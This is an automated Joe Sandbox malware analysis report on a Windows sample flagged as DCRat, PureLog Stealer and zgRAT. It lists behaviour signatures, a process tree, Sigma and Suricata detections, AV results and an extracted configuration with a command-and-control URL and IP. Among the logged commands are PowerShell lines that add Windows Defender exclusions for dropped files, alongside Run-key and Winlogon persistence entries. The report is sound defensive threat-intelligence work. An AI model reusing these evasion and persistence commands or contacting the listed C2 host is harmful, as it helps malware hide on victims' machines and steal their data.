Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3AAyq819Vy.exe

Overview

General Information

Sample name:3AAyq819Vy.exe
renamed because original name is a hash value
Original sample name:059DD6A8CB2D31871BB82DBB158965FA.exe
Analysis ID:1549729
MD5:059dd6a8cb2d31871bb82dbb158965fa
SHA1:10507debf7b1a88791b65fc08a5b995f9b873aee
SHA256:3d92f050fc88966bd639d315d04fa9fb686ba5f61b2ac81c1e47449125a5a9cb
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files to the user root directory
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 3AAyq819Vy.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\3AAyq819Vy.exe" MD5: 059DD6A8CB2D31871BB82DBB158965FA)
    • wscript.exe (PID: 7396 cmdline: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\hyperContaineragent\CYWN6IDJqLBtl0YjSrMSw1hYURgrvXzRLx.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Bridgecommon.exe (PID: 7636 cmdline: "C:\hyperContaineragent/Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
          • csc.exe (PID: 7800 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 7852 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4DA.tmp" "c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • powershell.exe (PID: 2500 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3320 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 3336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1900 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 2304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 2668 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 5820 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\hyperContaineragent\Bridgecommon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 5436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2172 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7928 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 8068 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 2212 cmdline: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7808 cmdline: C:\hyperContaineragent\Bridgecommon.exe MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7900 cmdline: C:\hyperContaineragent\Bridgecommon.exe MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 8032 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 8080 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 6624 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7052 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 7104 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 7780 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • nFQRHbQjcuhfqIAubZpdQD.exe (PID: 7636 cmdline: "C:\Program Files (x86)\windows sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • Bridgecommon.exe (PID: 1816 cmdline: "C:\hyperContaineragent\Bridgecommon.exe" MD5: 477DB3DE46B7779B63495A8BDB279F2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
3AAyq819Vy.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    3AAyq819Vy.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\hyperContaineragent\Bridgecommon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000000.00000003.1725117408.0000000004D46000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000005.00000000.1861446770.0000000000F72000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000000.00000003.1724034780.00000000063AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        Process Memory Space: Bridgecommon.exe PID: 7636JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 1 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.3.3AAyq819Vy.exe.63f9700.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.3AAyq819Vy.exe.63f9700.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              5.0.Bridgecommon.exe.f70000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                5.0.Bridgecommon.exe.f70000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.3AAyq819Vy.exe.4d94700.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    Sigma Signatures

                                    System Summary

                                    barindex
                                    Sigma detected: Execution from Suspicious Folder
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , CommandLine: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, NewProcessName: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, OriginalFileName: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2172, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe" , ProcessId: 2212, ProcessName: nFQRHbQjcuhfqIAubZpdQD.exe
                                    Sigma detected: Files With System Process Name In Unsuspected Locations
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 7800, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nFQRHbQjcuhfqIAubZpdQD
                                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
                                    Sigma detected: Suspicious Program Location with Network Connections
                                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 37.44.238.250, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
                                    Sigma detected: CurrentVersion Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nFQRHbQjcuhfqIAubZpdQD
                                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe", EventID: 13, EventType: SetValue, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", ProcessId: 7800, ProcessName: csc.exe
                                    Sigma detected: Powershell Defender Exclusion
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
                                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\3AAyq819Vy.exe", ParentImage: C:\Users\user\Desktop\3AAyq819Vy.exe, ParentProcessId: 7352, ParentProcessName: 3AAyq819Vy.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbe" , ProcessId: 7396, ProcessName: wscript.exe
                                    Sigma detected: Dynamic CSharp Compile Artefact
                                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\hyperContaineragent\Bridgecommon.exe, ProcessId: 7636, TargetFilename: C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline
                                    Sigma detected: Non Interactive PowerShell Process Spawned
                                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe', ProcessId: 2500, ProcessName: powershell.exe
                                    Sigma detected: Windows Processes Suspicious Parent Directory
                                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6356, ProcessName: svchost.exe

                                    Data Obfuscation

                                    barindex
                                    Sigma detected: Dot net compiler compiles file from suspicious location
                                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\hyperContaineragent/Bridgecommon.exe", ParentImage: C:\hyperContaineragent\Bridgecommon.exe, ParentProcessId: 7636, ParentProcessName: Bridgecommon.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ih0xhhgm\ih0xhhgm.cmdline", ProcessId: 7800, ProcessName: csc.exe

                                    Suricata Signatures

                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-11-05T23:52:18.200573+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449730TCP
                                    2024-11-05T23:52:57.106277+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449767TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2024-11-05T23:52:32.430448+010020480951A Network Trojan was detected192.168.2.44973637.44.238.25080TCP

                                    Joe Sandbox Signatures

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Antivirus / Scanner detection for submitted sample
                                    Source: 3AAyq819Vy.exeAvira: detected
                                    Antivirus detection for URL or domain
                                    Source: http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.phpAvira URL Cloud: Label: malware
                                    Antivirus detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\hyperContaineragent\6TX15s3o3dST68MJkEj7bgGxU9zvefDuKPar5COcqC66esPk.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\hyperContaineragent\Bridgecommon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\gMEBPrHPbx.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Found malware configuration
                                    Source: 00000005.00000002.1943082141.0000000013491000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal", "MUTEX": "DCR_MUTEX-fMqIIZ3msKTluYQzOgJz", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                                    Multi AV Scanner detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeReversingLabs: Detection: 83%
                                    Source: C:\Program Files\Internet Explorer\en-GB\nFQRHbQjcuhfqIAubZpdQD.exeReversingLabs: Detection: 83%
                                    Source: C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exeReversingLabs: Detection: 83%
                                    Source: C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exeReversingLabs: Detection: 83%
                                    Source: C:\Users\user\Desktop\WWLLRmVS.logReversingLabs: Detection: 23%
                                    Source: C:\Users\user\Desktop\tYJQSSrA.logReversingLabs: Detection: 23%
                                    Source: C:\hyperContaineragent\Bridgecommon.exeReversingLabs: Detection: 83%
                                    Multi AV Scanner detection for submitted file
                                    Source: 3AAyq819Vy.exeReversingLabs: Detection: 65%
                                    AI detected suspicious sample
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                                    Machine Learning detection for dropped file
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoe Sandbox ML: detected
                                    Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\izhrsOEp.logJoe Sandbox ML: detected
                                    Source: C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exeJoe Sandbox ML: detected
